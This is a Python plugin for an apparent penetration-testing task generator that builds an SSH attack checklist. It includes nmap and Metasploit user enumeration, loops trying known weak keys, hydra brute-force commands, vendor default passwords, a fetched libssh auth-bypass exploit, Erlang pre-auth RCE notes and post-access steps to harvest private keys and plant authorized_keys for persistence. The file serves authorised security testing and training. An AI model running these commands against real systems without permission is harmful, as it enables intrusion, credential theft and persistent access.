"""
SSH/SFTP service enumeration plugin

Generates tasks for SSH enumeration including:
- Banner grabbing and version detection
- Configuration audit (weak algorithms, auth methods)
- User enumeration (CVE-2018-15473)
- SSH key testing (known weak keys, Debian PRNG)
- Authentication brute-force (last resort)
- Version-specific exploits (libssh, Erlang/OTP)

Extracted from HackTricks: network-services-pentesting/pentesting-ssh.md
Generated by: CrackPot v1.0
"""

from typing import Dict, Any, List
from .base import ServicePlugin
from .registry import ServiceRegistry


@ServiceRegistry.register
class SSHPlugin(ServicePlugin):
    """SSH/SFTP enumeration plugin"""

    @property
    def name(self) -> str:
        return "ssh"

    @property
    def default_ports(self) -> List[int]:
        return [22, 2222]

    @property
    def service_names(self) -> List[str]:
        return ['ssh', 'openssh', 'dropbear', 'libssh', 'sftp', 'ssh-server']

    def detect(self, port_info: Dict[str, Any]) -> bool:
        """Detect SSH services"""
        service = port_info.get('service', '').lower()
        port = port_info.get('port')

        # Check service name
        if any(svc in service for svc in self.service_names):
            return True

        # Check common ports
        if port in self.default_ports:
            return True

        return False

    def get_task_tree(self, target: str, port: int, service_info: Dict[str, Any]) -> Dict[str, Any]:
        """Generate SSH enumeration task tree"""
        version = service_info.get('version', '')
        product = service_info.get('product', '').lower()

        tasks = {
            'id': f'ssh-enum-{port}',
            'name': f'SSH Enumeration (Port {port})',
            'type': 'parent',
            'children': []
        }

        # TASK 1: Banner Grabbing
        tasks['children'].append({
            'id': f'ssh-banner-{port}',
            'name': 'Banner Grabbing',
            'type': 'command',
            'metadata': {
                'command': f'nc -vn {target} {port}',
                'description': 'Grab SSH banner to identify version (press Ctrl+C after banner appears)',
                'tags': ['OSCP:HIGH', 'QUICK_WIN', 'MANUAL'],
                'flag_explanations': {
                    '-v': 'Verbose output (show connection details)',
                    '-n': 'No DNS resolution (faster, use IP directly)',
                    str(port): f'Connect to port {port} (SSH default)'
                },
                'success_indicators': [
                    'SSH banner displayed (e.g., SSH-2.0-OpenSSH_7.4)',
                    'Version number visible',
                    'Server implementation identified'
                ],
                'failure_indicators': [
                    'Connection refused (service not running)',
                    'Connection timeout (firewall blocking)',
                    'No banner displayed'
                ],
                'next_steps': [
                    'Research version for known CVEs: searchsploit <version>',
                    'Run comprehensive audit: ssh-audit',
                    'Check for weak configuration'
                ],
                'alternatives': [
                    f'nmap -sV -p{port} {target}',
                    f'ssh {target} -p{port} (banner shown before auth prompt)',
                    f'telnet {target} {port}'
                ],
                'notes': 'Banner reveals exact version - critical for CVE research. OpenSSH versions < 7.7 vulnerable to user enumeration.'
            }
        })

        # TASK 2: NSE SSH Enumeration Scripts
        tasks['children'].append({
            'id': f'ssh-nse-enum-{port}',
            'name': 'NSE SSH Enumeration',
            'type': 'parent',
            'children': [
                {
                    'id': f'ssh2-enum-algos-{port}',
                    'name': 'SSH Algorithm Enumeration',
                    'type': 'command',
                    'metadata': {
                        'command': f'nmap --script ssh2-enum-algos -p{port} {target}',
                        'description': 'Enumerate supported SSH algorithms (encryption, MAC, compression, key exchange)',
                        'tags': ['OSCP:HIGH', 'NSE', 'QUICK_WIN'],
                        'flag_explanations': {
                            '--script ssh2-enum-algos': 'NSE script to enumerate SSH2 algorithms',
                            f'-p{port}': f'Target SSH port {port}'
                        },
                        'success_indicators': [
                            'Encryption algorithms listed (aes128-ctr, aes256-ctr, etc.)',
                            'MAC algorithms shown (hmac-sha1, hmac-sha2-256, etc.)',
                            'Key exchange methods displayed (diffie-hellman-group14-sha1, etc.)',
                            'Compression methods listed (none, zlib)'
                        ],
                        'failure_indicators': [
                            'Connection refused',
                            'SSH version too old (SSHv1 only)',
                            'Firewall blocking'
                        ],
                        'next_steps': [
                            'Identify weak algorithms (CBC ciphers, MD5/SHA1 MACs)',
                            'Check for deprecated key exchange (diffie-hellman-group1-sha1)',
                            'Research CVEs for specific algorithm combinations'
                        ],
                        'alternatives': [
                            f'ssh-audit {target} -p{port}',
                            f'ssh -vv {target} -p{port} 2>&1 | grep "kex\\|cipher\\|mac"'
                        ],
                        'notes': 'Chapter 9: NSE ssh2-enum-algos provides comprehensive algorithm enumeration. Look for weak ciphers (3des-cbc, arcfour) and MACs (hmac-md5, hmac-sha1-96).'
                    }
                },
                {
                    'id': f'ssh-hostkey-{port}',
                    'name': 'SSH Host Key Extraction',
                    'type': 'command',
                    'metadata': {
                        'command': f'nmap --script ssh-hostkey --script-args ssh_hostkey=full -p{port} {target}',
                        'description': 'Extract SSH host keys and fingerprints (all key types)',
                        'tags': ['OSCP:MEDIUM', 'NSE', 'QUICK_WIN'],
                        'flag_explanations': {
                            '--script ssh-hostkey': 'NSE script to extract SSH host public keys',
                            '--script-args ssh_hostkey=full': 'Extract full key (not just fingerprint)',
                            f'-p{port}': f'Target SSH port {port}'
                        },
                        'success_indicators': [
                            'RSA host key extracted',
                            'ECDSA host key extracted',
                            'ED25519 host key extracted',
                            'Key fingerprints (SHA256, MD5) displayed'
                        ],
                        'failure_indicators': [
                            'No keys extracted',
                            'Connection timeout',
                            'SSH version incompatible'
                        ],
                        'next_steps': [
                            'Check key strength (RSA < 2048 bits = weak)',
                            'Compare keys against known compromised databases',
                            'Save keys for MITM scenarios'
                        ],
                        'alternatives': [
                            f'ssh-keyscan -t rsa,ecdsa,ed25519 {target} -p{port}',
                            f'ssh-keygen -l -f <(ssh-keyscan {target} 2>/dev/null)'
                        ],
                        'notes': 'Chapter 9: ssh-hostkey extracts all available host key types. Useful for identifying key algorithm support and detecting weak keys.'
                    }
                },
                {
                    'id': f'ssh-auth-methods-nse-{port}',
                    'name': 'SSH Authentication Methods (NSE)',
                    'type': 'command',
                    'metadata': {
                        'command': f'nmap --script ssh-auth-methods --script-args="ssh.user=root" -p{port} {target}',
                        'description': 'Enumerate SSH authentication methods for specific user',
                        'tags': ['OSCP:HIGH', 'NSE', 'ENUM'],
                        'flag_explanations': {
                            '--script ssh-auth-methods': 'NSE script to enumerate auth methods',
                            '--script-args ssh.user=root': 'Test with root user (most privileged)',
                            f'-p{port}': f'Target SSH port {port}'
                        },
                        'success_indicators': [
                            'Supported methods listed (publickey, password, keyboard-interactive)',
                            'None authentication available (rare)',
                            'Method preferences identified'
                        ],
                        'failure_indicators': [
                            'Script execution failed',
                            'Connection refused',
                            'User-specific auth config blocks enumeration'
                        ],
                        'next_steps': [
                            'If password enabled: prepare for brute-force (last resort)',
                            'If publickey only: test known SSH keys',
                            'If keyboard-interactive: potential MFA bypass scenarios'
                        ],
                        'alternatives': [
                            f'ssh -v {target} -p{port} 2>&1 | grep "Authentications that can continue"',
                            f'ssh -o PreferredAuthentications=password -v {target} -p{port}'
                        ],
                        'notes': 'Chapter 9: NSE ssh-auth-methods provides clean enumeration. Test multiple users (admin, test, backup) for different auth configs.'
                    }
                },
                {
                    'id': f'sshv1-{port}',
                    'name': 'SSH Version 1 Detection',
                    'type': 'command',
                    'metadata': {
                        'command': f'nmap --script sshv1 -p{port} {target}',
                        'description': 'Detect if server supports deprecated SSH Protocol 1 (CVE-1999-0662)',
                        'tags': ['OSCP:MEDIUM', 'NSE', 'VULN_SCAN'],
                        'flag_explanations': {
                            '--script sshv1': 'NSE script to test for SSHv1 support',
                            f'-p{port}': f'Target SSH port {port}'
                        },
                        'success_indicators': [
                            'Server supports SSHv1 (VULNERABLE)',
                            'SSHv1 explicitly disabled (secure)'
                        ],
                        'failure_indicators': [
                            'Unable to determine',
                            'Connection error'
                        ],
                        'next_steps': [
                            'If SSHv1 enabled: CRITICAL vulnerability - protocol has known weaknesses',
                            'Research SSHv1 exploits (session key recovery, insertion attacks)',
                            'Document for report (HIGH severity finding)'
                        ],
                        'alternatives': [
                            f'ssh -1 {target} -p{port} (manual SSHv1 connection test)',
                            f'telnet {target} {port} (check banner for SSHv1 support)'
                        ],
                        'notes': 'Chapter 9: SSHv1 is deprecated and insecure (CVE-1999-0662). Any SSHv1 support is HIGH severity. Modern OpenSSH removes it entirely.'
                    }
                },
                {
                    'id': f'ssh-run-{port}',
                    'name': 'SSH Command Execution Test',
                    'type': 'manual',
                    'metadata': {
                        'description': 'Test SSH command execution with NSE ssh-run script (requires valid credentials)',
                        'tags': ['MANUAL', 'OSCP:LOW', 'NSE', 'POST_AUTH'],
                        'notes': f'''SSH Command Execution (NSE ssh-run):

Requires valid credentials discovered earlier.

Basic usage:
  nmap --script ssh-run --script-args="ssh-run.cmd='id',ssh-run.username='user',ssh-run.password='pass'" -p{port} {target}

Script arguments:
  ssh-run.cmd         - Command to execute (e.g., 'whoami', 'uname -a')
  ssh-run.username    - SSH username
  ssh-run.password    - SSH password
  ssh-run.keyfile     - Private key file path (alternative to password)

Examples:
  System info:
    --script-args="ssh-run.cmd='uname -a',ssh-run.username=admin,ssh-run.password=password"

  Check sudo:
    --script-args="ssh-run.cmd='sudo -l',ssh-run.username=user,ssh-run.password=pass"

  File enumeration:
    --script-args="ssh-run.cmd='ls -la /home',ssh-run.username=user,ssh-run.password=pass"

Use cases:
  - Quick command execution without interactive shell
  - Automated post-exploitation enumeration
  - Testing sudo privileges remotely
  - File system enumeration

OSCP: Use after finding credentials to quickly enumerate target without full shell.
                        ''',
                        'success_indicators': [
                            'Command executes successfully',
                            'Output returned in script results',
                            'No authentication errors'
                        ],
                        'failure_indicators': [
                            'Authentication failed',
                            'Command execution blocked',
                            'Insufficient privileges'
                        ],
                        'alternatives': [
                            f'ssh user@{target} -p{port} "command"',
                            'Use full SSH session for interactive enumeration'
                        ]
                    }
                }
            ]
        })

        # TASK 3: SSH Configuration Audit (3rd party tool)
        tasks['children'].append({
            'id': f'ssh-audit-{port}',
            'name': 'SSH Configuration Audit (ssh-audit)',
            'type': 'command',
            'metadata': {
                'command': f'ssh-audit {target} -p {port}',
                'description': 'Comprehensive SSH security audit (weak algorithms, CVEs, config issues)',
                'tags': ['OSCP:HIGH', 'AUTOMATED', 'QUICK_WIN'],
                'flag_explanations': {
                    '-p': f'Target port {port}',
                    target: 'Target IP or hostname'
                },
                'success_indicators': [
                    'Algorithm list displayed',
                    'CVE warnings shown',
                    'Weak ciphers identified',
                    'Authentication methods enumerated'
                ],
                'failure_indicators': [
                    'Connection refused',
                    'Timeout (firewall blocking)',
                    'Tool not installed'
                ],
                'next_steps': [
                    'Focus on weak/deprecated algorithms for downgrade attacks',
                    'Research any CVEs mentioned',
                    'Check if password authentication enabled'
                ],
                'alternatives': [
                    f'nmap --script ssh2-enum-algos -p{port} {target}',
                    f'nmap --script ssh-auth-methods --script-args="ssh.user=root" -p{port} {target}'
                ],
                'notes': 'Install: git clone https://github.com/jtesta/ssh-audit.git. Identifies weak ciphers, key exchange algorithms, and MAC algorithms. Complements NSE scripts with detailed recommendations.'
            }
        })

        # TASK 4: User Enumeration (CVE-2018-15473)
        if 'openssh' in product or 'openssh' in version.lower():
            # Extract version number if possible
            version_vulnerable = False
            if version:
                # Check if OpenSSH < 7.7 (vulnerable to CVE-2018-15473)
                import re
                match = re.search(r'(\d+\.\d+)', version)
                if match:
                    ver_num = float(match.group(1))
                    if ver_num < 7.7:
                        version_vulnerable = True

            enum_task = {
                'id': f'ssh-user-enum-{port}',
                'name': 'User Enumeration (CVE-2018-15473)',
                'type': 'parent',
                'children': [
                    {
                        'id': f'ssh-user-enum-msf-{port}',
                        'name': 'User Enum: Metasploit Scanner',
                        'type': 'command',
                        'metadata': {
                            'command': f'msfconsole -q -x "use scanner/ssh/ssh_enumusers; set RHOSTS {target}; set RPORT {port}; set USER_FILE /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt; run; exit"',
                            'description': 'Enumerate valid SSH users via timing attack (OpenSSH < 7.7)',
                            'tags': ['OSCP:MEDIUM', 'ENUM', 'AUTOMATED'],
                            'flag_explanations': {
                                'scanner/ssh/ssh_enumusers': 'MSF module exploiting CVE-2018-15473',
                                'RHOSTS': 'Target IP address',
                                'RPORT': 'Target SSH port',
                                'USER_FILE': 'List of usernames to test'
                            },
                            'success_indicators': [
                                'Valid users found',
                                'Module reports "User <username> found"',
                                'No timing errors'
                            ],
                            'failure_indicators': [
                                'All users invalid',
                                'Connection errors',
                                'Version not vulnerable (OpenSSH >= 7.7)'
                            ],
                            'next_steps': [
                                'Save valid usernames for credential attacks',
                                'Test default passwords for found users',
                                'Attempt SSH key testing with valid users'
                            ],
                            'alternatives': [
                                'Python script: https://github.com/epi052/cve-2018-15473',
                                'Manual timing attack with verbose ssh'
                            ],
                            'notes': 'Only works on OpenSSH < 7.7. Timing-based, requires multiple attempts for accuracy.'
                        }
                    }
                ]
            }

            if version_vulnerable:
                enum_task['metadata'] = {
                    'notes': f'Version {version} is VULNERABLE to CVE-2018-15473 user enumeration'
                }

            tasks['children'].append(enum_task)

        # TASK 6: SSH Key Testing
        tasks['children'].append({
            'id': f'ssh-key-test-{port}',
            'name': 'SSH Key Testing',
            'type': 'parent',
            'children': [
                {
                    'id': f'ssh-badkeys-{port}',
                    'name': 'Test Known Bad Keys',
                    'type': 'command',
                    'metadata': {
                        'command': f'# First, clone badkeys repo if not present\n# git clone https://github.com/rapid7/ssh-badkeys.git\n# Then test each key:\nfor key in ssh-badkeys/authorized/*.pub; do ssh -i "$key" -o StrictHostKeyChecking=no {target} -p {port} "whoami" && echo "SUCCESS: $key"; done',
                        'description': 'Test known compromised/weak SSH keys from rapid7 badkeys database',
                        'tags': ['OSCP:MEDIUM', 'QUICK_WIN'],
                        'flag_explanations': {
                            '-i': 'Identity file (private key to use)',
                            '-o StrictHostKeyChecking=no': 'Disable host key verification',
                            'whoami': 'Simple command to verify access'
                        },
                        'success_indicators': [
                            'Command executes successfully',
                            'Username returned',
                            'No authentication errors'
                        ],
                        'failure_indicators': [
                            'Permission denied for all keys',
                            'No matching keys found',
                            'Connection refused'
                        ],
                        'next_steps': [
                            'If successful: Document key used and gained access',
                            'Enumerate system after gaining access',
                            'Check for privilege escalation'
                        ],
                        'alternatives': [
                            'nmap --script ssh-publickey-acceptance',
                            'MSF: auxiliary/scanner/ssh/ssh_identify_pubkeys'
                        ],
                        'notes': 'Badkeys repo: https://github.com/rapid7/ssh-badkeys. Includes keys from IoT devices, routers, cloud images.'
                    }
                },
                {
                    'id': f'ssh-debian-keys-{port}',
                    'name': 'Test Debian Weak Keys',
                    'type': 'command',
                    'metadata': {
                        'command': f'# Clone Debian weak keys if not present\n# git clone https://github.com/g0tmi1k/debian-ssh.git\n# Test keys by username (if known)\nfor key in debian-ssh/2048/*.pub; do ssh -i "$key" -o StrictHostKeyChecking=no {target} -p {port} "whoami" 2>/dev/null && echo "SUCCESS: $key"; done',
                        'description': 'Test Debian predictable PRNG vulnerability keys (CVE-2008-0166)',
                        'tags': ['OSCP:MEDIUM', 'LINUX'],
                        'flag_explanations': {
                            '-i': 'Private key to authenticate with',
                            '-o StrictHostKeyChecking=no': 'Skip host key verification',
                            '2>/dev/null': 'Suppress error messages'
                        },
                        'success_indicators': [
                            'Successful authentication',
                            'Shell access gained',
                            'Weak key identified'
                        ],
                        'failure_indicators': [
                            'All keys rejected',
                            'System not vulnerable',
                            'Keys not matching username'
                        ],
                        'next_steps': [
                            'If successful: Full system access likely',
                            'Document exact key used',
                            'Begin post-exploitation enumeration'
                        ],
                        'alternatives': [
                            'ssh-keybrute.py: https://github.com/snowdroppe/ssh-keybrute',
                            'Manual: Try keys matching known usernames from /etc/passwd'
                        ],
                        'notes': 'Debian/Ubuntu systems 2006-2008 have predictable SSH keys. Keys pre-generated for all possible seeds. Target legacy systems.'
                    }
                }
            ]
        })

        # TASK 7: Default Credentials Test
        tasks['children'].append({
            'id': f'ssh-default-creds-{port}',
            'name': 'Test Default Credentials',
            'type': 'manual',
            'metadata': {
                'description': 'Manually test vendor-specific default SSH credentials',
                'tags': ['MANUAL', 'OSCP:HIGH', 'QUICK_WIN'],
                'notes': f'''
Common SSH Default Credentials (from HackTricks):

Cisco:
  admin/admin, admin/Admin123, cisco/cisco, enable/cisco

Dell:
  root/calvin, admin/password

HP:
  admin/admin, admin/password

VMware:
  root/vmware, vi-admin/vmware

APC:
  apc/apc, device/apc

IoT/Embedded:
  root/root, admin/admin, root/1234, pi/raspberry

Test manually:
  ssh admin@{target} -p {port}
  ssh root@{target} -p {port}
  ssh cisco@{target} -p {port}

If banner reveals vendor, focus on vendor-specific defaults.
                ''',
                'success_indicators': [
                    'Successful login',
                    'Shell prompt appears',
                    'No password change required'
                ],
                'failure_indicators': [
                    'Authentication failure',
                    'Account locked after attempts',
                    'Credentials changed from default'
                ],
                'next_steps': [
                    'Document successful credentials',
                    'Begin post-exploitation enumeration',
                    'Check sudo privileges: sudo -l'
                ],
                'alternatives': [
                    'Automated: hydra with small default credential list',
                    'See full vendor list in HackTricks default creds section'
                ]
            }
        })

        # TASK 8: Credential Brute Force (LAST RESORT)
        tasks['children'].append({
            'id': f'ssh-bruteforce-{port}',
            'name': 'Credential Brute-force (LAST RESORT)',
            'type': 'command',
            'metadata': {
                'command': f'hydra -L /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -t 4 -V ssh://{target}:{port}',
                'description': 'Brute-force SSH credentials (SLOW, NOISY, often triggers lockout)',
                'tags': ['OSCP:LOW', 'AUTOMATED', 'NOISY'],
                'flag_explanations': {
                    '-L': 'Username list (test multiple users)',
                    '-P': 'Password list (rockyou = 14M passwords)',
                    '-t 4': 'Parallel tasks (4 = safe, higher = faster but noisier)',
                    '-V': 'Verbose (show each attempt)'
                },
                'success_indicators': [
                    'Valid credentials found',
                    '[22][ssh] host: X login: Y password: Z',
                    'Authentication successful'
                ],
                'failure_indicators': [
                    'Account lockout (too many attempts)',
                    'All attempts failed',
                    'Connection rate-limited',
                    'Extremely slow progress'
                ],
                'next_steps': [
                    'If successful: Login and begin enumeration',
                    'If failed: Try other attack vectors first',
                    'Consider password spraying with common passwords'
                ],
                'alternatives': [
                    f'medusa -h {target} -U users.txt -P passwords.txt -M ssh',
                    f'ncrack -p {port} --user admin -P passwords.txt {target}',
                    'Manual: ssh user@{target} with common passwords'
                ],
                'notes': 'SSH brute-force is SLOW (delay between attempts). Rarely successful in CTF/OSCP. Try other methods first. For exam: document exact command used.',
                # Phase 4: Wordlist selection metadata
                'wordlist_purpose': 'password-cracking'
            }
        })

        # TASK 9: Kerberos/GSSAPI Authentication (if Windows/Domain environment)
        tasks['children'].append({
            'id': f'ssh-kerberos-{port}',
            'name': 'Kerberos/GSSAPI Authentication',
            'type': 'manual',
            'metadata': {
                'description': 'Authenticate using Kerberos TGT (Windows domain environments)',
                'tags': ['MANUAL', 'OSCP:LOW', 'WINDOWS'],
                'notes': f'''
Kerberos SSH Authentication (Domain Environments):

Prerequisites:
  - Valid domain credentials or TGT
  - Target is Windows OpenSSH on domain controller
  - GSSAPI authentication enabled

Workflow:
  1. Sync time with KDC:
     sudo ntpdate <dc.fqdn>

  2. Generate krb5.conf:
     netexec smb <dc.fqdn> -u <user> -p '<pass>' -k --generate-krb5-file krb5.conf
     sudo cp krb5.conf /etc/krb5.conf

  3. Obtain TGT:
     kinit <user>
     klist  # Verify TGT obtained

  4. SSH with GSSAPI:
     ssh -o GSSAPIAuthentication=yes <user>@<host.fqdn>

Important:
  - Must use FQDN matching host SPN
  - Short hostname or IP will fail with "Server not found in Kerberos database"
  - crackmapexec ssh --kerberos also supports this

Troubleshooting:
  - KRB_AP_ERR_SKEW: Time not synced with DC
  - Server not found: Wrong hostname (not matching SPN)
  - GSSAPI not available: Server doesn't support it
                ''',
                'success_indicators': [
                    'GSSAPI authentication successful',
                    'No password prompt',
                    'Shell access gained'
                ],
                'failure_indicators': [
                    'GSSAPI not available',
                    'Server not found in Kerberos database',
                    'Time skew too great'
                ]
            }
        })

        # TASK 10: Version-Specific Exploits
        exploit_tasks = []

        # libssh CVE-2018-10933 (Authentication Bypass)
        if 'libssh' in product or 'libssh' in version.lower():
            exploit_tasks.append({
                'id': f'libssh-cve-2018-10933-{port}',
                'name': 'libssh Auth Bypass (CVE-2018-10933)',
                'type': 'command',
                'metadata': {
                    'command': f'# Python exploit available\n# wget https://www.exploit-db.com/download/46307\n# python3 46307.py {target} {port} "id"',
                    'description': 'libssh 0.6-0.8 authentication bypass (send SSH_MSG_USERAUTH_SUCCESS)',
                    'tags': ['OSCP:HIGH', 'EXPLOIT'],
                    'flag_explanations': {
                        '46307.py': 'ExploitDB Python exploit for CVE-2018-10933',
                        '"id"': 'Command to execute on successful bypass'
                    },
                    'success_indicators': [
                        'Authentication bypassed',
                        'Command executed',
                        'Shell access gained'
                    ],
                    'failure_indicators': [
                        'Exploit failed',
                        'Not vulnerable (libssh >= 0.8.4)',
                        'Server-side implementation different'
                    ],
                    'next_steps': [
                        'If successful: Spawn interactive shell',
                        'Enumerate system for privilege escalation',
                        'Document CVE and exploit path'
                    ],
                    'alternatives': [
                        'Manual: Craft SSH_MSG_USERAUTH_SUCCESS packet',
                        'Metasploit module may exist'
                    ],
                    'notes': 'CVE-2018-10933: Client sends success message instead of auth request. Server-side logic flaw. libssh 0.6.0-0.7.5 and 0.8.0-0.8.3 vulnerable.'
                }
            })

        # Erlang/OTP SSH Daemon CVE-2025-32433 (Pre-Auth RCE)
        if 'erlang' in product.lower() or 'otp' in product.lower():
            exploit_tasks.append({
                'id': f'erlang-cve-2025-32433-{port}',
                'name': 'Erlang/OTP SSH RCE (CVE-2025-32433)',
                'type': 'command',
                'metadata': {
                    'command': f'# Python PoC:\n# Send SSH_MSG_CHANNEL_OPEN (0x5a) before auth\n# Check: https://unit42.paloaltonetworks.com/erlang-otp-cve-2025-32433/',
                    'description': 'Erlang/OTP SSH pre-auth RCE (state machine bypass)',
                    'tags': ['OSCP:HIGH', 'EXPLOIT', 'RCE'],
                    'flag_explanations': {
                        'SSH_MSG_CHANNEL_OPEN': 'Connection protocol message (0x5a)',
                        'Pre-auth': 'Send before authentication completes'
                    },
                    'success_indicators': [
                        'Channel opened pre-auth',
                        'Command execution achieved',
                        'Root shell (daemon runs as root on embedded devices)'
                    ],
                    'failure_indicators': [
                        'State machine validation working',
                        'Not Erlang/OTP SSH',
                        'Patched version (>= 27.3.3, 26.2.5.11, 25.3.2.20)'
                    ],
                    'next_steps': [
                        'If vulnerable: Execute reverse shell',
                        'Common on OT/embedded devices',
                        'Document RCE chain for report'
                    ],
                    'alternatives': [
                        'Manual: Craft packet with message code >= 80',
                        'Blind RCE detection via DNS lookup'
                    ],
                    'notes': 'CVE-2025-32433: State machine bypass. Affects OTP < 27.3.3, 26.2.5.11, 25.3.2.20. Usually root access on embedded/OT systems.'
                }
            })

        # Add exploit tasks if any version-specific vulns detected
        if exploit_tasks:
            tasks['children'].append({
                'id': f'ssh-exploits-{port}',
                'name': 'Version-Specific Exploits',
                'type': 'parent',
                'children': exploit_tasks
            })

        # TASK 11: General Exploit Research
        if version:
            tasks['children'].append({
                'id': f'exploit-research-ssh-{port}',
                'name': f'Exploit Research: {version}',
                'type': 'parent',
                'children': [
                    {
                        'id': f'searchsploit-ssh-{port}',
                        'name': f'SearchSploit: {version}',
                        'type': 'command',
                        'metadata': {
                            'command': f'searchsploit {version}',
                            'description': 'Search ExploitDB for known SSH vulnerabilities',
                            'tags': ['OSCP:HIGH', 'RESEARCH'],
                            'flag_explanations': {
                                version: 'SSH version from banner'
                            },
                            'success_indicators': [
                                'Exploits found',
                                'CVE numbers listed',
                                'Exploit paths shown'
                            ],
                            'failure_indicators': [
                                'No results',
                                'Version too new',
                                'No public exploits'
                            ],
                            'next_steps': [
                                'Review exploit details: searchsploit -x <exploit>',
                                'Download exploit: searchsploit -m <exploit>',
                                'Test exploit in safe environment first'
                            ],
                            'alternatives': [
                                'Google: "<version> exploit"',
                                'CVE databases',
                                'GitHub exploit repos'
                            ],
                            'notes': 'Focus on remote exploits and authentication bypasses. Pre-auth exploits are highest value.'
                        }
                    },
                    {
                        'id': f'cve-lookup-ssh-{port}',
                        'name': f'CVE Lookup: {version}',
                        'type': 'command',
                        'metadata': {
                            'command': f'# Manual CVE research\n# Visit: https://www.cvedetails.com\n# Search: {version}',
                            'description': 'Research CVE databases for SSH vulnerabilities',
                            'tags': ['RESEARCH', 'OSCP:MEDIUM'],
                            'success_indicators': [
                                'CVE numbers found',
                                'Severity ratings visible',
                                'Exploits available'
                            ],
                            'alternatives': [
                                'nvd.nist.gov/vuln/search',
                                'vuldb.com',
                                'exploit-db.com'
                            ]
                        }
                    }
                ]
            })

        # TASK 12: Config File Analysis (Post-Access)
        tasks['children'].append({
            'id': f'ssh-config-analysis-{port}',
            'name': 'Config File Analysis (Post-Access)',
            'type': 'manual',
            'metadata': {
                'description': 'Analyze SSH configuration files after gaining access',
                'tags': ['MANUAL', 'OSCP:MEDIUM', 'POST_ACCESS'],
                'notes': '''
SSH Configuration Files (Linux):
  /etc/ssh/sshd_config          # Server config
  /etc/ssh/ssh_config           # Client config
  ~/.ssh/authorized_keys        # User's authorized public keys
  ~/.ssh/id_rsa                 # User's private key
  ~/.ssh/known_hosts            # Known host keys (lateral movement)
  /var/log/auth.log             # Authentication logs

Key Config Settings:
  PermitRootLogin yes           # Root login allowed (security issue)
  PasswordAuthentication yes    # Password auth enabled
  PubkeyAuthentication yes      # Key-based auth enabled
  PermitEmptyPasswords yes      # CRITICAL ISSUE
  AllowUsers/AllowGroups        # Access restrictions

Post-Access Enumeration:
  1. Check sshd_config for misconfigurations:
     cat /etc/ssh/sshd_config | grep -v "^#" | grep -v "^$"

  2. Find private keys (privilege escalation):
     find / -name id_rsa 2>/dev/null
     find / -name id_dsa 2>/dev/null
     find /home -name authorized_keys 2>/dev/null

  3. Check known_hosts for lateral movement:
     cat ~/.ssh/known_hosts
     # Hosts this user has connected to

  4. Extract authorized_keys (persistence):
     cat ~/.ssh/authorized_keys

  5. Check auth logs for other users:
     grep "Accepted" /var/log/auth.log

Privilege Escalation:
  - Private keys with no passphrase = instant access to other systems
  - Writable authorized_keys = add your own key for persistence
  - PermitRootLogin + weak root password = immediate root
                ''',
                'success_indicators': [
                    'Config files readable',
                    'Private keys found',
                    'Misconfigurations identified'
                ],
                'next_steps': [
                    'Test found private keys against other systems',
                    'Add persistence via authorized_keys',
                    'Document misconfigurations for report'
                ]
            }
        })

        return tasks

    def on_task_complete(self, task_id: str, result: str, target: str) -> List[Dict[str, Any]]:
        """Generate follow-up tasks based on completed task results"""
        return []

    def get_manual_alternatives(self, task_id: str) -> List[str]:
        """Get manual alternatives for automated tasks"""
        alternatives = {
            'ssh-audit': [
                'ssh -v <target> # Verbose connection shows supported methods',
                'Manual banner analysis for version research'
            ],
            'ssh-bruteforce': [
                'Manual: ssh user@<target> with common passwords',
                'Test default credentials first (faster than brute-force)'
            ]
        }

        for key in alternatives:
            if key in task_id:
                return alternatives[key]

        return ['Manual SSH connection: ssh -v <target> -p <port>']
